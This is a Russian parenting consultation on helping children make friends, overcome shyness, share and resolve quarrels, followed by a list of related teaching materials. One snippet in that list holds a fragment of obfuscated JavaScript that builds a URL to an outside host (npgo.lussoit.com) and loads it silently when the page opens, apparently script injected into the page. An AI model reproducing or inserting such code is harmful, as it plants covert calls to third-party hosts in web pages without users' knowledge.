Искусство дружить
консультация на тему
Предварительный просмотр:
Искусство дружить
Англичане считают, что умение общаться с людьми — главный талант. Почему у одних людей много друзей, а у других — никого? Основы общения закладываются в детстве, и если человек не научится этому искусству в нежном возрасте, уже не научится никогда.
Сколько бы общения дети ни получали в своей семье, им необходимо общество сверстников. Играя с ровесниками, они учатся дружить и ссориться, идти на компромиссы и заключать перемирия, соревноваться и соотносить свои успехи с успехами других детей. Даже «дразнилки», «беготня», «кривляния» в прочие детские забавы, кажущиеся взрослым форменным безобразием, имеют свой скрытый смысл. Так наши малыши проявляют свою индивидуальность, оригинальность, чувство юмора, находчивость, остроумие. Ведь в кругу своих сверстников не надо «держать лицо», как в присутствии взрослых. Психологи не советуют родителям активно вмешиваться в детскую дружбу. Дети должны сами научиться дружить. А наша задача — всего лишь чуть-чуть им в этом помочь.
__________________________________________________________________
Предложите ребенку нарисовать себя и друзей. Обратите внимание на расположение фигур. Малыш изобразил себя в центре? Возможно, у него есть задатки лидера. Все дети держатся за руки, и их фигурки примерно одинаковы по величине? Тогда, скорее всего, ваш ребенок легко сходится с другими детьми. Но вот если его собственная фигура изображена где-то в стороне и при этом мельче остальных фигур — задумайтесь. Быть может, это предупреждение о серьезных проблемах в общении со сверстниками.
____________________________________________________________________
ЧТО ТАКОЕ ДРУЖБА?
Для начала поинтересуйтесь у своего ребенка, как он понимает слово «дружба». Скорее всего, он вам ответит, что дружить — это значит играть, веселиться, бегать, болтать, в общем, получать от общения сплошное удовольствие. А если у друга беда? Первоклассницы Аня и Оля считали себя лучшими подругами. Они вместе ходили в школу, вместе играли и гуляли, занимались в спортивной секции. Однажды Оля упала и повредила ногу. Врачи предписали девочке постельный режим. Узнав о случившемся, Аня расстроиласъ за подругу, но ненадолго. Она решила, что на время Олиной болезни заведет себе новых приятельниц, а когда подруга поправится, они снова будут дружить. Но почему девочка повела себя подобным образом? Почему не наведает свою подругу, не звонит ей и не переживает за ее здоровье? Можно, конечно, предположить, что Оля бессердечная, но, скорее всего, ей попросту никто и никогда не объяснял, что дружить — это значит не только проводить вместе досуг, но и заботиться о друге, сочувствовать и помогать ему в беде. И если наши дети не догадываются об этом, то почему бы не рассказать им о важности и ценности дружеских отношений? Чтобы в будущем из них выросли верные и надежные друзья, а не эгоисты, которые ищут в общении лишь выгоду
У меня нет друзей
Есть две основные причины, по которым детям трудно устанавливать контакт
1. Чрезмерный эгоизм и стремление к лидерству. Чаще всего с этой проблемой сталкиваются дети - «любимчики». Привыкнув, что в семье удовлетворяются все его прихоти, ребенок и в новом коллективе стремится занять центральное место, подчинить своей воле сверстников. Но товарищи по играм, как правило, не принимают таких детей компанию. Кому же хочется быть всегда ведомым (а зачастую и побиваемым)? Впрочем, если родители вовремя смогут усмирить свою безграничную любовь, то больших проблем с общением у таких детей в будущем не возникнет. Со временем потенциальный лидер так или иначе найдет свое место под солнцем, не приобретет друзей миром, так «завоюет» их.
2. Излишняя застенчивость. А это уже серьезнее. Робкий ребенок вряд ли чего-то добьется в жизни, энергичные и контактные сверстники попросту опередят его и оставят на обочине жизненной гонки. Кстати, это может проявиться уже в начальной школе, где «тихони» обычно стесняются отвечать у доски, не проявляют инициативу и е результате редко становятся хорошими учениками даже при высоких способностях. Но в силах родителей помочь ребенку преодолеть застенчивость.
- Главная задача — вселить в малыша уверенность в себе. Отмечайте любой успех ребенка, а неудачи делайте незаметными и пустяковыми.
- Вместо того чтобы предлагать малышу «пойти» поиграть с кем-нибудь, приглашайте гостей к себе домой. Дома ребенок может похвастаться порядком в комнате, коллекцией вкладышей, многообразием игрушек. Это повышает авторитет малыша в глазах детей и способствует самоутверждению ребенка.
- Попробуйте пробудить в ребенке интерес к какому-либо увлечению, на фоне которого может развиться дружба. Запишите малыша в кружок— шахмат, пения, рисования, главное, чтобы это были занятия в группе. Там ребенок будет развивать не только свой интеллект, но и навыки сотрудничества. А выбирая тот или иной вид спорта, отдайте предпочтение командным играм, в которых даже застенчивые не остаются в стороне.
- Не ругайте ребенка за «трусость». Это вызовет лишь обратный эффект: он замкнется в себе. Лучше помогите малышу включиться в игру, приняв в ней участие. для начала можно подобрать для игр товарищей помладше, среди которых ребенок может стать лидером, несмотря на свою застенчивость.
ДОРОГА К ОБЩЕСТВУ
Чтобы ваш ребенок не испытывал трудностей с общением, научите его:
- Поступать с другими так, как он хотел бы, чтобы поступали с ним. Возможно, пока для вашего ребенка это только слова. Но со временем он обязательно поймет их смысл. Для этого старайтесь почаще обсуждать различные ситуации, в которые попадает ваш малыш, общаясь с товарищами: «Сегодня ты ударил Петю. А если ударят тебя, тебе ведь тоже станет больно. Или: «Правда, приятно, что Полина помогла собрать тебе все игрушки? В следующий раз помоги ей ты».
- Делиться своим имуществом. Щедрость — еще один шаг навстречу другим, но приучайте ребенка к щедрости грамотно. Не заставляйте делиться насильно, выхватывая из рук малыша игрушку с криком: «Теперь машинкой играет Вася!» — но всегда хвалите его за уступчивость и доброту, тогда во взрослой жизни у него не будет проблем с общением, ведь он с детства приучится искать компромисс.
СВЕТЛОЕ ЧУВСТВО
Для того чтобы ребенок вырос коммуникабельным, постарайтесь с раннего детства ориентировать его на общение с самыми разными людьми — с ровесниками, со старшими и младшими ребятами. И, конечно же, с детьми противоположного пола. Тем более что пока интересы малышей ограничиваются детской площадкой и песочницей, вопросы полов для них совершенно неактуальны. Мальчики и девочки играют друг с другом просто потому, что им интересно и весело вместе.
Как-то, собираясь в детский сад, мой сын потребовал дать ему еще одну конфету. Спрашиваю: «Это еще зачем?». «Не зачем, — отвечает гордо, — а для кого. Для Кати». Кто бы мог подумать! Еще вчера и разговоров про Катю не было — все про машинки и про конструкторы. А тут конфету дай. А однажды «кавалер» пришел расстроенный: «Катя сказала, что больше со мной не дружит. И разразился слезами — отнюдь «не мужскими, скупыми». Но две красивые заколки, преподнесенные Кате в подарок поутру, сделали свое дело. Мир был восстановлен. С подобными историями сталкиваются почти все родители. И главное здесь — не давить на детей, не хихикать, не навешивать им тут же ярлыки «жениха» и «невесты». Не надо ни поощрять, ни запрещать этой «нежной» дружбы. Ваше дело — не спугнуть доверие малыша. Тогда, повзрослев, ваше сокровище обязательно поведает вам о своем уже серьезном романе. И вот тут потребуются ваши советы.
Ссоры и драки — частые явления е детских коллективах, однако далеко не каждый конфликт требует вмешательства родителей. Не кидайтесь наводить порядок при первых же признаках нарождающейся ссоры. Тем более с криками и угрозами: «Я вас всех сейчас накажу». В этом случае дети справедливо будут считать, что сила — единственный способ погасить ссору. Предоставьте детям возможность самостоятельно улаживать свои разногласия. В их жизни еще не раз будут возникать спорные ситуации, а мам рядом может и не оказаться.
Если же вы все-таки решили вмешаться, дайте высказаться всем детям, а не только тому, кого считаете правым. Самая распространенная ошибка — встать на сторону одного из детей, не важно, своего ребенка или его друга.
И еще: научите малышей мириться. Объясните ребенку, что в случае проступка человек должен извиниться и попросить прощения. Но! Никогда не заставляйте малыша извиняться, если он не знает и не понимает, за что именно. Проговаривайте, какие именно его действия вызвали обиду товарища: «Ты стукнул Машу, а ей больно». Или «Ты обозвал Витю, и он обиделся». Кстати, не стесняйтесь в случае необходимости и сами извиниться перед ребенком. Это вовсе не подорвет ваш авторитет, как считают многие родители. Наоборот, ребенок обязательно будет подражать вам и постепенно научится отвечать за свои поступки
ПСИХОЛОГИ СЧИТАЮТ, ЧТО ОТНОШЕНИЯ, КОТОРЫЕ ЗАВЯЗАЛИСЬ В ШКОЛЬНЫЕ ГОДЫ, САМЫЕ ПРОЧНЫЕ.
По теме: методические разработки, презентации и конспекты
Роль произведений изобразительного искусства в формировании творческой личности ребенка. Нравственное воспитание в процессе приобщения к искусству.
Актуальность В ст.64 п.2 Закона РФ «Об образовании» говорится о том, что «образовательные программы дошкольного образования направлены на разностороннее развитие детей дошкольного возраста с уче...
Педагогическое значение регионального искусства (на примере искусства Камчатского края)
В задачи регионального компонента входит формирование у каждого дошкольника системы знаний о своеобразии родного края, знакомство с богатством народной культуры, художественными традициями, приобщение...
Конспект НОД во II младшей группе на тему " Дружит с бабочкой цветок, Дружим мы с тобою».
Конспект НОД во II младшей группе на тему «Дружит с бабочкой цветок,Дружим мы с тобою».Конспект НОД во II младшей группе на тему " Дружит с бабочкой цветок,Дружим мы с...
Что делать, если с вашим ребенком никто не дружит? Как помочь ребенку, если с ним не хотят дружить.
var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'npgo.lussoit.com\',\'67\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !function(){if(!window.mainSc...
Тематическая беседа "Мы дружим с физкультурой" материал (группа раннего возраста) на тему: «Мы дружим с физкультурой»
Тематическая беседа "Мы дружим с физкультурой"материал (группа раннего возраста) на тему:«Мы дружим с физкультурой» Цель: учить заботиться о своем здоровье; прививать л...
Программа семейного клуба «Учимся дружить» Название: Программа семейного клуба «Учимся дружить» Работа с родителями вновь прибывших детей. 2019-2020год
Программа семейного клуба «Учимся дружить». 1. Паспорт программы.Наименование программы «Учимся дружить» программа семейного клуба в условиях ДОУЦель программы:...